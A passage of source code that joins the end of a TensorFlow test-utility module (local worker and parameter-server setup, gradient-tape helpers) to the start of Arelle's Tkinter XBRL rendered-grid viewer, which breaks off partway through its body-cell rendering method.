worker_config: (optional) `tf.ConfigProto` to initialize workers. Can be
used to instantiate multiple devices etc.
ps_config: (optional) `tf.ConfigProto` to initialize PS servers.
Returns:
A tuple `(worker_servers, ps_servers)`. `worker_servers` is a list
of `num_workers` objects of type `tf.distribute.Server` (all running
locally);
and `ps_servers` is a list of `num_ps` objects of similar type.
Raises:
ImportError: if portpicker module was not found at load time
"""
import portpicker # pylint: disable=g-import-not-at-top
worker_ports = [portpicker.pick_unused_port() for _ in range(num_workers)]
ps_ports = [portpicker.pick_unused_port() for _ in range(num_ps)]
cluster_dict = {
"worker": ["localhost:%s" % port for port in worker_ports],
"ps": ["localhost:%s" % port for port in ps_ports]
}
cs = server_lib.ClusterSpec(cluster_dict)
workers = [
server_lib.Server(
cs,
job_name="worker",
protocol=protocol,
task_index=ix,
config=worker_config,
start=True) for ix in range(num_workers)
]
ps_servers = [
server_lib.Server(
cs,
job_name="ps",
protocol=protocol,
task_index=ix,
config=ps_config,
start=True) for ix in range(num_ps)
]
return workers, ps_servers
def get_node_def_from_graph(node_name, graph_def):
"""Returns the `NodeDef` instance for given node name in the graph def.
This method explores only the NodeDefs in `graph_def.node`.
Args:
node_name: Name of the NodeDef to search for.
graph_def: An instance of `GraphDef` proto.
Returns:
the `NodeDef` instance whose name field matches the given node_name or None.
"""
for node_def in graph_def.node:
if node_def.name == node_name:
return node_def
return None
def set_producer_version(graph, producer_version):
"""Sets graph.graph_def_versions.producer to `producer_version`."""
# The C API doesn't expose altering GraphDefVersions. We can indirectly set
# it via import_graph_def though.
graph_def = graph_pb2.GraphDef()
graph_def.versions.producer = producer_version
with graph.as_default():
importer.import_graph_def(graph_def)
assert graph.graph_def_versions.producer, producer_version
@contextlib.contextmanager
def _fake_gradient_tape_context_manager():
"""tf.gradients(...) implemented as tf.GradientTape context manager interface.
This is useful to test tf.gradients() in tests that uses tf.GradientTape().
Yields:
gradient tape instance that's implemented by tf.gradients() underneath.
"""
try:
class FakeGradientTape:
def watch(self, x):
pass
def gradient(self, y, x, grad_ys=None):
result = gradients_impl.gradients(y, x, grad_ys)
# Unlike `tape.gradient()`, `tf.gradients()` returns a list for a single
# element. So unpack if needed to match `tape.gradient()` behavior.
if not isinstance(x, (list, tuple)):
assert len(result) == 1
return result[0]
return result
yield FakeGradientTape()
finally:
pass
class AbstractGradientTape:
"""Abstract GradientTape context manager that has multiple implementations.
This is useful to test both tf.GradientTape() and tf.gradients() without
duplicating tests.
"""
def __init__(self, use_tape, persistent=False):
self._use_tape = use_tape
self._persistent = persistent
def __enter__(self):
if self._use_tape:
self._tape_impl = backprop.GradientTape(persistent=self._persistent)
else:
self._tape_impl = _fake_gradient_tape_context_manager()
return self._tape_impl.__enter__()
def __exit__(self, exc_type, exc_val, exc_tb):
self._tape_impl.__exit__(exc_type, exc_val, exc_tb)
@contextlib.contextmanager
def run_functions_eagerly(run_eagerly):
"""Runs functions eagerly if `run_eagerly` is true.
WARNING: Setting `run_eagerly` to True in tests running in V1 graph mode
*WILL NOT* make the tf.function to run eagerly because eager is disabled by
default in V1. Instead, tf.function will run as a traced graph function.
Ensures that the state (for running functions eagerly) is back to the initial
`def_function.RUN_FUNCTIONS_EAGERLY` state.
Args:
run_eagerly: Boolean determining whether to run the function eagerly or not.
Raises:
ValueError if `run_eagerly` is not a boolean.
Yields:
Nothing.
"""
if not isinstance(run_eagerly, bool):
raise ValueError(
"Expected bool for `run_eagerly` but got {}".format(run_eagerly))
is_eager = context.executing_eagerly()
if not is_eager and run_eagerly:
logging.warning(
"Running tf.function eagerly in V1 graph mode is not supported. "
"tf.function will be run as a traced graph function.")
initial_state = def_function.functions_run_eagerly()
def_function.run_functions_eagerly(run_eagerly)
try:
yield
finally:
def_function.run_functions_eagerly(initial_state)
|
ViewWinRenderedGrid.py
|
'''
Created on Oct 5, 2010
@author: Mark V Systems Limited
(c) Copyright 2010 Mark V Systems Limited, All rights reserved.
'''
import os, threading, time, logging
from tkinter import Menu, BooleanVar, font as tkFont
from arelle import (ViewWinTkTable, ModelDocument, ModelDtsObject, ModelInstanceObject, XbrlConst,
ModelXbrl, Locale, FunctionXfi,
ValidateXbrlDimensions)
from arelle.ModelValue import qname, QName
from arelle.RenderingResolver import resolveAxesStructure, RENDER_UNITS_PER_CHAR
from arelle.ModelFormulaObject import Aspect, aspectModels, aspectModelAspect
from arelle.ModelInstanceObject import ModelDimensionValue
from arelle.ModelRenderingObject import (ModelClosedDefinitionNode, ModelEuAxisCoord,
ModelFilterDefinitionNode,
OPEN_ASPECT_ENTRY_SURROGATE)
from arelle.FormulaEvaluator import init as formulaEvaluatorInit, aspectMatches
from arelle.PrototypeInstanceObject import FactPrototype
from arelle.UITkTable import XbrlTable
from arelle.DialogNewFactItem import getNewFactItemOptions
from collections import defaultdict
from arelle.ValidateXbrl import ValidateXbrl
from arelle.XbrlConst import eurofilingModelNamespace, eurofilingModelPrefix
from arelle.ValidateXbrlDimensions import isFactDimensionallyValid
from arelle.XmlValidate import UNVALIDATED, validate as xmlValidate
try:
from tkinter import ttk
_Combobox = ttk.Combobox
except ImportError:
from ttk import Combobox
_Combobox = Combobox
emptyList = []
ENTRY_WIDTH_IN_CHARS = 12 # width of a data column entry cell in characters (nominal)
ENTRY_WIDTH_SCREEN_UNITS = 100
PADDING = 20 # screen units of padding between entry cells
qnPercentItemType = qname("{http://www.xbrl.org/dtr/type/numeric}num:percentItemType")
qnPureItemType = qname("{http://www.xbrl.org/2003/instance}xbrli:pureItemType")
integerItemTypes = {"integerItemType", "nonPositiveIntegerItemType", "negativeIntegerItemType",
"longItemType", "intItemType", "shortItemType", "byteItemType",
"nonNegativeIntegerItemType", "unsignedLongItemType", "unsignedIntItemType",
"unsignedShortItemType", "unsignedByteItemType", "positiveIntegerItemType"}
TABLE_AXIS_ROLES = (XbrlConst.euTableAxis, XbrlConst.tableBreakdown, XbrlConst.tableBreakdownMMDD, XbrlConst.tableBreakdown201305, XbrlConst.tableBreakdown201301, XbrlConst.tableAxis2011)
'''
Returns a tuple with all known table axis roles
'''
def getTableAxisArcroles():
return TABLE_AXIS_ROLES
def viewRenderedGrid(modelXbrl, tabWin, lang=None):
modelXbrl.modelManager.showStatus(_("viewing rendering"))
view = ViewRenderedGrid(modelXbrl, tabWin, lang)
view.blockMenuEvents = 1
menu = view.contextMenu()
optionsMenu = Menu(view.viewFrame, tearoff=0)
optionsMenu.add_command(label=_("New fact item options"), underline=0, command=lambda: getNewFactItemOptions(modelXbrl.modelManager.cntlr, view.newFactItemOptions))
optionsMenu.add_command(label=_("Open breakdown entry rows"), underline=0, command=view.setOpenBreakdownEntryRows)
view.ignoreDimValidity.trace("w", view.viewReloadDueToMenuAction)
optionsMenu.add_checkbutton(label=_("Ignore Dimensional Validity"), underline=0, variable=view.ignoreDimValidity, onvalue=True, offvalue=False)
view.xAxisChildrenFirst.trace("w", view.viewReloadDueToMenuAction)
optionsMenu.add_checkbutton(label=_("X-Axis Children First"), underline=0, variable=view.xAxisChildrenFirst, onvalue=True, offvalue=False)
view.yAxisChildrenFirst.trace("w", view.viewReloadDueToMenuAction)
optionsMenu.add_checkbutton(label=_("Y-Axis Children First"), underline=0, variable=view.yAxisChildrenFirst, onvalue=True, offvalue=False)
menu.add_cascade(label=_("Options"), menu=optionsMenu, underline=0)
view.tablesMenu = Menu(view.viewFrame, tearoff=0)
menu.add_cascade(label=_("Tables"), menu=view.tablesMenu, underline=0)
view.tablesMenuLength = 0
view.menuAddLangs()
saveMenu = Menu(view.viewFrame, tearoff=0)
saveMenu.add_command(label=_("HTML file"), underline=0, command=lambda: view.modelXbrl.modelManager.cntlr.fileSave(view=view, fileType="html"))
saveMenu.add_command(label=_("Layout model"), underline=0, command=lambda: view.modelXbrl.modelManager.cntlr.fileSave(view=view, fileType="xml"))
saveMenu.add_command(label=_("XBRL instance"), underline=0, command=view.saveInstance)
menu.add_cascade(label=_("Save"), menu=saveMenu, underline=0)
view.view()
view.blockSelectEvent = 1
view.blockViewModelObject = 0
view.viewFrame.bind("<Enter>", view.cellEnter, '+')
view.viewFrame.bind("<Leave>", view.cellLeave, '+')
view.viewFrame.bind("<FocusOut>", view.onQuitView, '+')
view.viewFrame.bind("<1>", view.onClick, '+') # does not currently work (since tktable changes)
view.viewFrame.bind("<Configure>", view.onConfigure, '+') # frame resized, redo column header wrap length ratios
view.blockMenuEvents = 0
return view
class ViewRenderedGrid(ViewWinTkTable.ViewTkTable):
def __init__(self, modelXbrl, tabWin, lang):
super(ViewRenderedGrid, self).__init__(modelXbrl, tabWin, _("Table"),
False, lang, self.onQuitView)
self.newFactItemOptions = ModelInstanceObject.NewFactItemOptions(xbrlInstance=modelXbrl)
self.factPrototypes = []
self.aspectEntryObjectIdsNode = {}
self.aspectEntryObjectIdsCell = {}
self.factPrototypeAspectEntryObjectIds = defaultdict(set)
self.zOrdinateChoices = None
# context menu Boolean vars
self.options = self.modelXbrl.modelManager.cntlr.config.setdefault("viewRenderedGridOptions", {})
self.openBreakdownLines = self.options.setdefault("openBreakdownLines", 5) # ensure there is a default entry
self.ignoreDimValidity = BooleanVar(value=self.options.setdefault("ignoreDimValidity",True))
self.xAxisChildrenFirst = BooleanVar(value=self.options.setdefault("xAxisChildrenFirst",True))
self.yAxisChildrenFirst = BooleanVar(value=self.options.setdefault("yAxisChildrenFirst",False))
formulaEvaluatorInit() # one-time module initialization
def close(self):
super(ViewRenderedGrid, self).close()
if self.modelXbrl:
for fp in self.factPrototypes:
fp.clear()
self.factPrototypes = None
self.aspectEntryObjectIdsNode.clear()
self.aspectEntryObjectIdsCell.clear()
self.rendrCntx = None # remove the reference but do not manipulate since it may still be in use and shared
def loadTablesMenu(self):
tblMenuEntries = {}
tblRelSet = self.modelXbrl.relationshipSet("Table-rendering")
self.tablesToELR = {}
for tblLinkroleUri in tblRelSet.linkRoleUris:
for tableAxisArcrole in getTableAxisArcroles():
tblAxisRelSet = self.modelXbrl.relationshipSet(tableAxisArcrole, tblLinkroleUri)
if tblAxisRelSet and len(tblAxisRelSet.modelRelationships) > 0:
# table name
modelRoleTypes = self.modelXbrl.roleTypes.get(tblLinkroleUri)
if modelRoleTypes is not None and len(modelRoleTypes) > 0:
roledefinition = modelRoleTypes[0].definition
if roledefinition is None or roledefinition == "":
roledefinition = os.path.basename(tblLinkroleUri)
for table in tblAxisRelSet.rootConcepts:
# add table to menu if there's any entry
tblMenuEntries[roledefinition] = tblLinkroleUri
self.tablesToELR[table.objectId()] = tblLinkroleUri
break
self.tablesMenu.delete(0, self.tablesMenuLength)
self.tablesMenuLength = 0
self.tblELR = None
for tblMenuEntry in sorted(tblMenuEntries.items()):
tbl,elr = tblMenuEntry
self.tablesMenu.add_command(label=tbl, command=lambda e=elr: self.view(viewTblELR=e)) # use this to activate profiling from menu selection: , profile=True))
self.tablesMenuLength += 1
if self.tblELR is None:
self.tblELR = elr # start viewing first ELR
def viewReloadDueToMenuAction(self, *args):
if not self.blockMenuEvents:
# update config (config saved when exiting)
self.options["ignoreDimValidity"] = self.ignoreDimValidity.get()
self.options["xAxisChildrenFirst"] = self.xAxisChildrenFirst.get()
self.options["yAxisChildrenFirst"] = self.yAxisChildrenFirst.get()
self.view()
def setOpenBreakdownEntryRows(self, *args):
import tkinter.simpledialog
newValue = tkinter.simpledialog.askinteger(_("arelle - Open breakdown entry rows setting"),
_("The number of extra entry rows for open breakdowns is: {0} \n\n"
"(When a row header includes an open breakdown, such as \nfor typed dimension(s), this number of extra entry rows \nare provided below the table.)"
).format(self.options["openBreakdownLines"]),
parent=self.tabWin)
if newValue is not None:
self.options["openBreakdownLines"] = self.openBreakdownLines = newValue
self.viewReloadDueToMenuAction()
def view(self, viewTblELR=None, newInstance=None, profile=False):
'''
if profile: # for debugging only, to use, uncomment in loadTablesMenu
import cProfile, pstats, sys
statsFile = "/Users/hermf/temp/profileRendering.bin"
cProfile.runctx("self.view(viewTblELR=viewTblELR)", globals(), locals(), statsFile)
priorStdOut = sys.stdout
sys.stdout = open("/Users/hermf/temp/profileRendering.txt", "w")
statObj = pstats.Stats(statsFile)
statObj.strip_dirs()
statObj.sort_stats("time")
statObj.print_stats()
statObj.print_callees()
statObj.print_callers()
sys.stdout.flush()
sys.stdout.close()
del statObj
sys.stdout = priorStdOut
os.remove(statsFile)
return
'''
startedAt = time.time()
self.blockMenuEvents += 1
if newInstance is not None:
self.modelXbrl = newInstance # a save operation has created a new instance to use subsequently
clearZchoices = False
if viewTblELR: # specific table selection
self.tblELR = viewTblELR
clearZchoices = True
else: # first or subsequenct reloading (language, dimensions, other change)
clearZchoices = self.zOrdinateChoices is None
if clearZchoices: # also need first time initialization
self.loadTablesMenu() # load menus (and initialize if first time
viewTblELR = self.tblELR
if not self.tblELR:
return # no table to display
if clearZchoices:
self.zOrdinateChoices = {}
# remove old widgets
self.viewFrame.clearGrid()
tblAxisRelSet, xTopStructuralNode, yTopStructuralNode, zTopStructuralNode = resolveAxesStructure(self, viewTblELR)
colAdjustment = 1 if zTopStructuralNode is not None else 0
self.table.resizeTable(self.dataFirstRow+self.dataRows-1, self.dataFirstCol+self.dataCols+colAdjustment-1, titleRows=self.dataFirstRow-1, titleColumns=self.dataFirstCol-1)
self.hasTableFilters = bool(self.modelTable.filterRelationships)
if tblAxisRelSet:
# review row header wrap widths and limit to 2/3 of the frame width (all are screen units)
fontWidth = tkFont.Font(font='TkTextFont').configure()['size']
fontWidth = fontWidth * 3 // 2
dataColsAllowanceWidth = (fontWidth * ENTRY_WIDTH_IN_CHARS + PADDING) * self.dataCols + PADDING
frameWidth = self.viewFrame.winfo_width()
if dataColsAllowanceWidth + self.rowHdrWrapLength > frameWidth:
if dataColsAllowanceWidth > frameWidth / 2:
rowHdrAllowanceWidth = frameWidth / 2
else:
rowHdrAllowanceWidth = frameWidth - dataColsAllowanceWidth
if self.rowHdrWrapLength > rowHdrAllowanceWidth:
widthRatio = rowHdrAllowanceWidth / self.rowHdrWrapLength
self.rowHdrWrapLength = rowHdrAllowanceWidth
fixedWidth = sum(w for w in self.rowHdrColWidth if w <= RENDER_UNITS_PER_CHAR)
adjustableWidth = sum(w for w in self.rowHdrColWidth if w > RENDER_UNITS_PER_CHAR)
if adjustableWidth> 0:
widthRatio = (rowHdrAllowanceWidth - fixedWidth) / adjustableWidth
for i in range(len(self.rowHdrColWidth)):
w = self.rowHdrColWidth[i]
if w > RENDER_UNITS_PER_CHAR:
self.rowHdrColWidth[i] = int(w * widthRatio)
self.aspectEntryObjectIdsNode.clear()
self.aspectEntryObjectIdsCell.clear()
self.factPrototypeAspectEntryObjectIds.clear()
self.table.initHeaderCellValue((self.modelTable.genLabel(lang=self.lang, strip=True) or # use table label, if any
self.roledefinition),
0, 0, (self.dataFirstCol - 2),
(self.dataFirstRow - 2),
XbrlTable.TG_TOP_LEFT_JUSTIFIED)
self.zAspectStructuralNodes = defaultdict(set)
self.zAxis(1, zTopStructuralNode, clearZchoices)
xStructuralNodes = []
colsFoundPlus1, _, _, _ = self.xAxis(self.dataFirstCol, self.colHdrTopRow, self.colHdrTopRow + self.colHdrRows - 1,
xTopStructuralNode, xStructuralNodes, self.xAxisChildrenFirst.get(), True, True)
_, rowsFoundPlus1 = self.yAxis(1, self.dataFirstRow,
yTopStructuralNode, self.yAxisChildrenFirst.get(), True, True)
self.table.resizeTable(rowsFoundPlus1-1,
colsFoundPlus1+colAdjustment-1,
clearData=False)
for fp in self.factPrototypes: # dereference prior facts
if fp is not None:
fp.clear()
self.factPrototypes = []
self.bodyCells(self.dataFirstRow, yTopStructuralNode, xStructuralNodes, self.zAspectStructuralNodes, self.yAxisChildrenFirst.get())
self.table.clearModificationStatus()
self.table.disableUnusedCells()
self.table.resizeTableCells()
# data cells
#print("body cells done")
self.modelXbrl.profileStat("viewTable_" + os.path.basename(viewTblELR), time.time() - startedAt)
#self.gridView.config(scrollregion=self.gridView.bbox(constants.ALL))
self.blockMenuEvents -= 1
def zAxis(self, row, zStructuralNode, clearZchoices):
if zStructuralNode is not None:
label = zStructuralNode.header(lang=self.lang)
xValue = self.dataFirstCol-1
yValue = row-1
self.table.initHeaderCellValue(label,
xValue, yValue,
0, 0,
XbrlTable.TG_LEFT_JUSTIFIED,
objectId=zStructuralNode.objectId())
if zStructuralNode.choiceStructuralNodes is not None: # combo box
valueHeaders = [''.ljust(zChoiceStructuralNode.indent * 4) + # indent if nested choices
(zChoiceStructuralNode.header(lang=self.lang) or '')
for zChoiceStructuralNode in zStructuralNode.choiceStructuralNodes]
zAxisIsOpenExplicitDimension = False
zAxisTypedDimension = None
i = zStructuralNode.choiceNodeIndex # for aspect entry, use header selected
comboBoxValue = None if i >= 0 else zStructuralNode.aspects.get('aspectValueLabel')
chosenStructuralNode = zStructuralNode.choiceStructuralNodes[i]
aspect = None
for aspect in chosenStructuralNode.aspectsCovered():
if aspect != Aspect.DIMENSIONS:
break
# for open filter nodes of explicit dimension allow selection of all values
zAxisAspectEntryMode = False
if isinstance(chosenStructuralNode.definitionNode, ModelFilterDefinitionNode):
if isinstance(aspect, QName):
dimConcept = self.modelXbrl.qnameConcepts[aspect]
if dimConcept.isExplicitDimension:
if len(valueHeaders) != 1 or valueHeaders[0]: # not just a blank initial entry
valueHeaders.append("(all members)")
else:
valueHeaders.extend(
self.explicitDimensionFilterMembers(zStructuralNode, chosenStructuralNode))
zAxisAspectEntryMode = True
zAxisIsOpenExplicitDimension = True
elif dimConcept.isTypedDimension:
if (zStructuralNode.choiceStructuralNodes[0].contextItemBinding is None and
not valueHeaders[0]): # remove filterNode from the list
''' this isn't reliable
if i > 0:
del zStructuralNode.choiceStructuralNodes[0]
del valueHeaders[0]
zStructuralNode.choiceNodeIndex = i = i-1
'''
if i >= 0:
chosenStructuralNode = zStructuralNode.choiceStructuralNodes[i]
else:
chosenStructuralNode = zStructuralNode # use aspects of structural node (for entered typed value)
if not comboBoxValue and not valueHeaders:
comboBoxValue = "--please select--"
i = -1
valueHeaders.append("(enter typed member)")
zAxisTypedDimension = dimConcept
combobox = self.table.initHeaderCombobox(self.dataFirstCol,
row-1,
colspan=0,
values=valueHeaders,
value=comboBoxValue,
selectindex=zStructuralNode.choiceNodeIndex if i >= 0 else None,
comboboxselected=self.onZComboBoxSelected)
combobox.zStructuralNode = zStructuralNode
combobox.zAxisIsOpenExplicitDimension = zAxisIsOpenExplicitDimension
combobox.zAxisTypedDimension = zAxisTypedDimension
combobox.zAxisAspectEntryMode = zAxisAspectEntryMode
combobox.zAxisAspect = aspect
combobox.zChoiceOrdIndex = row - 1
combobox.objectId = zStructuralNode.objectId()
# add aspect for chosen node
self.setZStructuralNodeAspects(chosenStructuralNode)
else:
#process aspect on this node before child nodes in case it is overridden
self.setZStructuralNodeAspects(zStructuralNode)
# nested nodes override parent nodes
for zStructuralNode in zStructuralNode.childStructuralNodes:
self.zAxis(row + 1, zStructuralNode, clearZchoices)
def setZStructuralNodeAspects(self, zStructuralNode, add=True):
for aspect in aspectModels[self.aspectModel]:
if (aspect in zStructuralNode.aspects or # might be added as custom-entered value (typed dim)
zStructuralNode.hasAspect(aspect, inherit=True)): #implies inheriting from other z axes
if aspect == Aspect.DIMENSIONS:
for dim in (zStructuralNode.aspectValue(Aspect.DIMENSIONS, inherit=True) or emptyList):
if add:
self.zAspectStructuralNodes[dim].add(zStructuralNode)
else:
self.zAspectStructuralNodes[dim].discard(zStructuralNode)
else:
if add:
self.zAspectStructuralNodes[aspect].add(zStructuralNode)
else:
self.zAspectStructuralNodes[aspect].discard(zStructuralNode)
def onZComboBoxSelected(self, event):
combobox = event.widget
structuralNode = combobox.zStructuralNode
if combobox.zAxisAspectEntryMode:
aspectValue = structuralNode.aspectEntryHeaderValues.get(combobox.get())
if aspectValue is not None:
self.zOrdinateChoices[structuralNode.definitionNode] = \
structuralNode.aspects = {combobox.zAxisAspect: aspectValue, 'aspectValueLabel': combobox.get()}
self.view() # redraw grid
elif combobox.zAxisIsOpenExplicitDimension and combobox.get() == "(all members)":
# reload combo box
self.comboboxLoadExplicitDimension(combobox,
structuralNode, # owner of combobox
structuralNode.choiceStructuralNodes[structuralNode.choiceNodeIndex]) # aspect filter node
structuralNode.choiceNodeIndex = -1 # use entry aspect value
combobox.zAxisAspectEntryMode = True
elif combobox.zAxisTypedDimension is not None and combobox.get() == "(enter typed member)":
# ask typed member entry
import tkinter.simpledialog
result = tkinter.simpledialog.askstring(_("Enter new typed dimension value"),
combobox.zAxisTypedDimension.label(),
parent=self.tabWin)
if result:
structuralNode.choiceNodeIndex = -1 # use entry aspect value
aspectValue = FunctionXfi.create_element(self.rendrCntx,
None,
(combobox.zAxisTypedDimension.typedDomainElement.qname, (), result))
self.zOrdinateChoices[structuralNode.definitionNode] = \
structuralNode.aspects = {combobox.zAxisAspect: aspectValue,
Aspect.DIMENSIONS: {combobox.zAxisTypedDimension.qname},
'aspectValueLabel': result}
if not hasattr(structuralNode, "aspectEntryHeaderValues"): structuralNode.aspectEntryHeaderValues = {}
structuralNode.aspectEntryHeaderValues[result] = aspectValue
valueHeaders = list(combobox["values"])
if result not in valueHeaders: valueHeaders.insert(0, result)
combobox["values"] = valueHeaders
combobox.zAxisAspectEntryMode = True
self.view() # redraw grid
else:
# remove prior combo choice aspect
self.setZStructuralNodeAspects(structuralNode.choiceStructuralNodes[structuralNode.choiceNodeIndex], add=False)
i = combobox.valueIndex
self.zOrdinateChoices[combobox.zStructuralNode.definitionNode] = structuralNode.choiceNodeIndex = i
# set current combo choice aspect
self.setZStructuralNodeAspects(structuralNode.choiceStructuralNodes[i])
self.view() # redraw grid
def xAxis(self, leftCol, topRow, rowBelow, xParentStructuralNode, xStructuralNodes, childrenFirst, renderNow, atTop):
if xParentStructuralNode is not None:
parentRow = rowBelow
noDescendants = True
rightCol = leftCol
widthToSpanParent = 0
for xStructuralNode in xParentStructuralNode.childStructuralNodes:
if not xStructuralNode.isRollUp:
noDescendants = False
isLabeled = xStructuralNode.isLabeled
isAbstract = (xStructuralNode.isAbstract or
(xStructuralNode.childStructuralNodes and
not isinstance(xStructuralNode.definitionNode, (ModelClosedDefinitionNode, ModelEuAxisCoord))))
isNonAbstract = not isAbstract
rightCol, row, width, leafNode = self.xAxis(leftCol, topRow + isLabeled, rowBelow, xStructuralNode, xStructuralNodes, # nested items before totals
childrenFirst, childrenFirst, False)
if row - 1 < parentRow:
parentRow = row - 1
#if not leafNode:
# rightCol -= 1
if isNonAbstract and isLabeled:
width += ENTRY_WIDTH_SCREEN_UNITS # width for this label, in screen units
widthToSpanParent += width
if childrenFirst:
thisCol = rightCol
else:
thisCol = leftCol
if renderNow and isLabeled:
columnspan = (rightCol - leftCol + (1 if isNonAbstract else 0))
label = xStructuralNode.header(lang=self.lang,
returnGenLabel=isinstance(xStructuralNode.definitionNode, (ModelClosedDefinitionNode, ModelEuAxisCoord)))
if label != OPEN_ASPECT_ENTRY_SURROGATE:
xValue = leftCol-1
yValue = topRow-1
headerLabel = label if label else " "
self.table.initHeaderCellValue(headerLabel,
xValue, yValue,
columnspan-1,
((row - topRow) if leafNode else 0),
XbrlTable.TG_CENTERED,
objectId=xStructuralNode.objectId(),
isRollUp=columnspan>1 and isNonAbstract and len(xStructuralNode.childStructuralNodes)<columnspan)
else:
self.aspectEntryObjectIdsNode[xStructuralNode.aspectEntryObjectId] = xStructuralNode
self.aspectEntryObjectIdsCell[xStructuralNode.aspectEntryObjectId] = self.table.initHeaderCombobox(leftCol-1,
topRow-1,
values=self.aspectEntryValues(xStructuralNode),
objectId=xStructuralNode.aspectEntryObjectId,
comboboxselected=self.onAspectComboboxSelection)
if isNonAbstract:
xValue = thisCol - 1
for i, role in enumerate(self.colHdrNonStdRoles):
j = (self.dataFirstRow
- len(self.colHdrNonStdRoles) + i)-1
self.table.initHeaderCellValue(xStructuralNode.header(role=role, lang=self.lang),
xValue,
j,
0,
0,
XbrlTable.TG_CENTERED,
objectId=xStructuralNode.objectId())
xStructuralNodes.append(xStructuralNode)
if isNonAbstract:
rightCol += 1
if renderNow and not childrenFirst:
self.xAxis(leftCol + (1 if isNonAbstract else 0), topRow + isLabeled, rowBelow, xStructuralNode, xStructuralNodes, childrenFirst, True, False) # render on this pass
leftCol = rightCol
return (rightCol, parentRow, widthToSpanParent, noDescendants)
def yAxis(self, leftCol, row, yParentStructuralNode, childrenFirst, renderNow, atLeft):
if yParentStructuralNode is not None:
nestedBottomRow = row
for yStructuralNode in yParentStructuralNode.childStructuralNodes:
if not yStructuralNode.isRollUp:
isAbstract = (yStructuralNode.isAbstract or
(yStructuralNode.childStructuralNodes and
not isinstance(yStructuralNode.definitionNode, (ModelClosedDefinitionNode, ModelEuAxisCoord))))
isNonAbstract = not isAbstract
isLabeled = yStructuralNode.isLabeled
nestRow, nextRow = self.yAxis(leftCol + isLabeled, row, yStructuralNode, # nested items before totals
childrenFirst, childrenFirst, False)
topRow = row
if childrenFirst and isNonAbstract:
row = nextRow
if renderNow and isLabeled:
columnspan = self.rowHdrCols - leftCol + 1 if isNonAbstract or nextRow == row else 1
depth = yStructuralNode.depth
wraplength = (self.rowHdrColWidth[depth] if isAbstract else
self.rowHdrWrapLength - sum(self.rowHdrColWidth[0:depth]))
if wraplength < 0:
wraplength = self.rowHdrColWidth[depth]
label = yStructuralNode.header(lang=self.lang,
returnGenLabel=isinstance(yStructuralNode.definitionNode, (ModelClosedDefinitionNode, ModelEuAxisCoord)),
recurseParent=not isinstance(yStructuralNode.definitionNode, ModelFilterDefinitionNode))
if label != OPEN_ASPECT_ENTRY_SURROGATE:
xValue = leftCol-1
yValue = row-1
self.table.initHeaderCellValue(label if label is not None else " ",
xValue, yValue,
columnspan-1,
(nestRow - row if isAbstract else 1)-1,
(XbrlTable.TG_LEFT_JUSTIFIED
if isNonAbstract or nestRow == row
else XbrlTable.TG_CENTERED),
objectId=yStructuralNode.objectId(),
isRollUp=columnspan>1 and isNonAbstract and (len(yStructuralNode.childStructuralNodes)>1 or (len(yStructuralNode.childStructuralNodes)==1 and not(yStructuralNode.childStructuralNodes[0].isAbstract))))
else:
self.aspectEntryObjectIdsNode[yStructuralNode.aspectEntryObjectId] = yStructuralNode
self.aspectEntryObjectIdsCell[yStructuralNode.aspectEntryObjectId] = self.table.initHeaderCombobox(leftCol-1,
row-1,
values=self.aspectEntryValues(yStructuralNode),
objectId=yStructuralNode.aspectEntryObjectId,
comboboxselected=self.onAspectComboboxSelection)
if isNonAbstract:
for i, role in enumerate(self.rowHdrNonStdRoles):
isCode = "code" in role
docCol = self.dataFirstCol - len(self.rowHdrNonStdRoles) + i-1
yValue = row-1
self.table.initHeaderCellValue(yStructuralNode.header(role=role, lang=self.lang),
docCol, yValue,
0, 0,
XbrlTable.TG_CENTERED if isCode else XbrlTable.TG_RIGHT_JUSTIFIED,
objectId=yStructuralNode.objectId())
if isNonAbstract:
row += 1
elif childrenFirst:
row = nextRow
if nestRow > nestedBottomRow:
nestedBottomRow = nestRow + (isNonAbstract and not childrenFirst)
if row > nestedBottomRow:
nestedBottomRow = row
#if renderNow and not childrenFirst:
# dummy, row = self.yAxis(leftCol + 1, row, yStructuralNode, childrenFirst, True, False) # render on this pass
if not childrenFirst:
dummy, row = self.yAxis(leftCol + isLabeled, row, yStructuralNode, childrenFirst, renderNow, False) # render on this pass
return (nestedBottomRow, row)
def getbackgroundColor(self, factPrototype):
bgColor = XbrlTable.TG_BG_DEFAULT # default monetary
concept = factPrototype.concept
if concept == None:
return bgColor
isNumeric = concept.isNumeric
# isMonetary = concept.isMonetary
isInteger = concept.baseXbrliType in integerItemTypes
isPercent = concept.typeQname in (qnPercentItemType, qnPureItemType)
isString = concept.baseXbrliType in ("stringItemType", "normalizedStringItemType")
isDate = concept.baseXbrliType in ("dateTimeItemType", "dateItemType")
if isNumeric:
if concept.isShares or isInteger:
bgColor = XbrlTable.TG_BG_ORANGE
elif isPercent:
bgColor = XbrlTable.TG_BG_YELLOW
# else assume isMonetary
elif isDate:
bgColor = XbrlTable.TG_BG_GREEN
elif isString:
bgColor = XbrlTable.TG_BG_VIOLET
return bgColor;
def bodyCells(self, row, yParentStructuralNode, xStructuralNodes, zAspectStructuralNodes, yChildrenFirst):
if yParentStructuralNode is not None:
dimDefaults = self.modelXbrl.qnameDimensionDefaults
for yStructuralNode in yParentStructuralNode.childStructuralNodes:
if yChildrenFirst:
row = self.bodyCells(row, yStructuralNode, xStructuralNodes, zAspectStructuralNodes, yChildrenFirst)
if not (yStructuralNode.isAbstract or
(yStructuralNode.childStructuralNodes and
not isinstance(yStructuralNode.definitionNode, (ModelClosedDefinitionNode, ModelEuAxisCoord)))) and yStructuralNode.isLabeled:
isYEntryPrototype = yStructuralNode.isEntryPrototype(default=False) # row to enter open aspects
yAspectStructuralNodes = defaultdict(set)
for aspect in aspectModels[self.aspectModel]:
if yStructuralNode.hasAspect(aspect):
if aspect == Aspect.DIMENSIONS:
for dim in (yStructuralNode.aspectValue(Aspect.DIMENSIONS) or emptyList):
yAspectStructuralNodes[dim].add(yStructuralNode)
else:
yAspectStructuralNodes[aspect].add(yStructuralNode)
yTagSelectors = yStructuralNode.tagSelectors
# data for columns of row
#print ("row " + str(row) + "yNode " + yStructuralNode.definitionNode.objectId() )
ignoreDimValidity = self.ignoreDimValidity.get()
for i, xStructuralNode in enumerate(xStructuralNodes):
isEntryPrototype = isYEntryPrototype or xStructuralNode.isEntryPrototype(default=False)
xAspectStructuralNodes = defaultdict(set)
for aspect in aspectModels[self.aspectModel]:
if xStructuralNode.hasAspect(aspect):
if aspect == Aspect.DIMENSIONS:
for dim in (xStructuralNode.aspectValue(Aspect.DIMENSIONS) or emptyList):
xAspectStructuralNodes[dim].add(xStructuralNode)
else:
